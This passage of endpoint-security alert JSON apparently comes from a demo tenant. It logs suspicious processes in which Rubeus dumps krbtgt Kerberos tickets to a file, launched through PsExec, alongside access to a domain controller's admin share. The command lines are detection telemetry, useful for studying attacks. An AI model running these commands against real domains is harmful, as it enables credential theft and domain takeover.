"f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:30.6333333Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:02:27.8509284Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 1972, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-21T02:02:27.8934015Z", "processId": 7684, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:09:12.3433333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:06:14.4989431Z", "processId": 4572, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:09:12.3433333Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:06:14.4989431Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4572, "processCommandLine": "\"cmd\" /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-21T02:06:14.5844121Z", "processId": 3772, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:09:12.61Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:06:14.5844121Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 3772, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-21T02:06:14.6224625Z", "processId": 2020, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:16:00.0533333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:12:11.2117933Z", "processId": 1984, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:16:00.0533333Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:12:11.2117933Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 1984, "processCommandLine": "\"cmd\" /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-21T02:12:26.7750233Z", "processId": 6124, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:16:00.2Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:12:26.7750233Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 6124, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-21T02:12:26.8137763Z", "processId": 3628, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:31.2Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:14:30.1674201Z", "processId": 9008, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:31.2Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:14:30.1674201Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 9008, "processCommandLine": "\"cmd\" /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-21T02:14:30.2553428Z", "processId": 9704, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:31.4166667Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:14:30.2553428Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 9704, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-21T02:14:30.3006412Z", "processId": 9688, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:19:00.2066667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:16:27.1164549Z", "processId": 7888, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:19:00.2066667Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:16:27.1164549Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 7888, "processCommandLine": "\"cmd\" /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-21T02:16:27.2968805Z", "processId": 4572, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:19:00.3066667Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:16:27.2968805Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 4572, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-21T02:16:27.339418Z", "processId": 4400, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:21:59.8333333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:21:59.8333333Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:51:47.9996584Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 5344, "processCommandLine": "\"cmd.exe\" ", "processCreationTime": "2022-11-21T02:18:37.2000654Z", "processId": 2116, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:21:59.8333333Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:18:37.2000654Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 2116, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-21T02:19:54.930545Z", "processId": 8024, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:23:09.26Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:22:22.878082Z", "processId": 8064, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:23:09.26Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:22:22.878082Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 8064, "processCommandLine": "\"cmd\" /c \"dir \\\\msdxv2-dc\\c$ && C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-21T02:22:23.0720526Z", "processId": 4940, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:28:02.7733333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:24:45.5696509Z", "processId": 6984, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:28:02.7733333Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:24:45.5696509Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 6984, "processCommandLine": "\"cmd\" /c \"dir \\\\msdxv2-dc\\c$ && C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-21T02:24:45.7593391Z", "processId": 8308, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:29:36.26Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:51:47.9996584Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 5344, "processCommandLine": "\"cmd.exe\" ", "processCreationTime": "2022-11-21T02:26:48.8391989Z", "processId": 8316, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:29:36.26Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:26:48.8391989Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 8316, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-21T02:27:03.6804628Z", "processId": 2736, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:29:36.9066667Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:26:48.8391989Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 8316, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-21T02:28:45.7900273Z", "processId": 5412, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:33:28.7633333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:31:41.876943Z", "processId": 9664, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:33:28.7633333Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:31:41.876943Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 9664, "processCommandLine": "\"cmd\" /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-21T02:31:42.071856Z", "processId": 5412, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:33:29.0166667Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:31:42.071856Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 5412, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-21T02:31:42.1120275Z", "processId": 9152, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:36:16.43Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:33:42.4457797Z", "processId": 9656, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:36:16.43Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": 